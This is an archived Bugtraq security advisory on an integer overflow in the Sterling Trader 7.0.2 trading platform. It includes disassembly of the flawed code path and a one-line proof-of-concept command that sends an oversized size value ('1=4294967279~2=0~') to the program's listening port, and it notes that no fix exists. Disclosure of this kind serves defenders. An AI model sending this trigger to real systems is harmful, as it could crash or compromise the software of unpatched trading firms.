lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <20110928145850.34d07329.aluigi@autistici.org>
Date: Wed, 28 Sep 2011 14:58:50 +0100
From: Luigi Auriemma <aluigi@...istici.org>
To: bugtraq@...urityfocus.com
Subject: Integer overflow in Sterling Trader 7.0.2

#######################################################################

                             Luigi Auriemma

Application:  Sterling Trader
              http://www.sterlingtrader.com/Trading_Platforms/trading_platforms2.html
Versions:     <= 7.0.2
Platforms:    Windows
Bug:          integer overflow
Exploitation: remote
Date:         25 Sep 2011
Author:       Luigi Auriemma
              e-mail: aluigi@...istici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


>From vendor's homepage:
"Sterling TraderĀ® Elite serves institutional firms on the buy side and
sell side. Featuring advanced OMS functionality, global market access,
and multi-broker connectivity solutions, Elite lets firms take control
of their trading."


#######################################################################

======
2) Bug
======


When this program is running (Base.exe or Elite.exe) it listens on the
first available TCP port which changes each time and it's affected by an
integer overflow vulnerability:

  004922E3   > 83BF BC001000 10   CMP DWORD PTR DS:[EDI+1000BC],10
  004922EA   . 0F8C 66010000      JL Elite.00492456
  004922F0   . 8D46 0C            LEA EAX,DWORD PTR DS:[ESI+C]
  004922F3   . 50                 PUSH EAX                  ; &num2
  004922F4   . 8D6E 08            LEA EBP,DWORD PTR DS:[ESI+8]
  004922F7   . 55                 PUSH EBP                  ; &num1 (size)
  004922F8   . 68 9C23A000        PUSH Elite.00A0239C       ; "1=%d~2=%d~"
  004922FD   . 53                 PUSH EBX
  004922FE   . E8 7CA44600        CALL Elite.008FC77F       ; sscanf
  00492303   . 83C4 10            ADD ESP,10
  00492306   . 83F8 02            CMP EAX,2
  00492309   . 0F85 4D010000      JNZ Elite.0049245C
  0049230F   . 8B55 00            MOV EDX,DWORD PTR SS:[EBP]
  00492312   . 83C2 10            ADD EDX,10                ; size + 0x10
  00492315   . B9 31000000        MOV ECX,31
  0049231A   . 66:898E 84000000   MOV WORD PTR DS:[ESI+84],CX
  00492321   . 8956 04            MOV DWORD PTR DS:[ESI+4],EDX
  00492324   . C746 70 10000000   MOV DWORD PTR DS:[ESI+70],10
  0049232B   . 33ED               XOR EBP,EBP
  0049232D   > 8B87 BC001000      MOV EAX,DWORD PTR DS:[EDI+1000BC]
  00492333   . 3B46 04            CMP EAX,DWORD PTR DS:[ESI+4]
  00492336   . 0F8C 3E010000      JL Elite.0049247A
  0049233C   . 89AF C0001000      MOV DWORD PTR DS:[EDI+1000C0],EBP
  00492342   . 8B4E 04            MOV ECX,DWORD PTR DS:[ESI+4]
  00492345   . 41                 INC ECX                   ; size + 1
  00492346   . 51                 PUSH ECX
  00492347   . E8 C0673F00        CALL Elite.00888B0C       ; malloc()
  0049234C   . 8B56 04            MOV EDX,DWORD PTR DS:[ESI+4]
  0049234F   . 52                 PUSH EDX
  00492350   . 53                 PUSH EBX
  00492351   . 50                 PUSH EAX
  00492352   . 8946 6C            MOV DWORD PTR DS:[ESI+6C],EAX
  00492355   . E8 36774600        CALL Elite.008F9A90       ; memcpy


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip

  udpsz -b a -T -c "1=4294967279~2=0~" SERVER PORT 0xffff


#######################################################################

======
4) Fix
======


No fix.


#######################################################################


--- 
Luigi Auriemma
http://aluigi.org

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ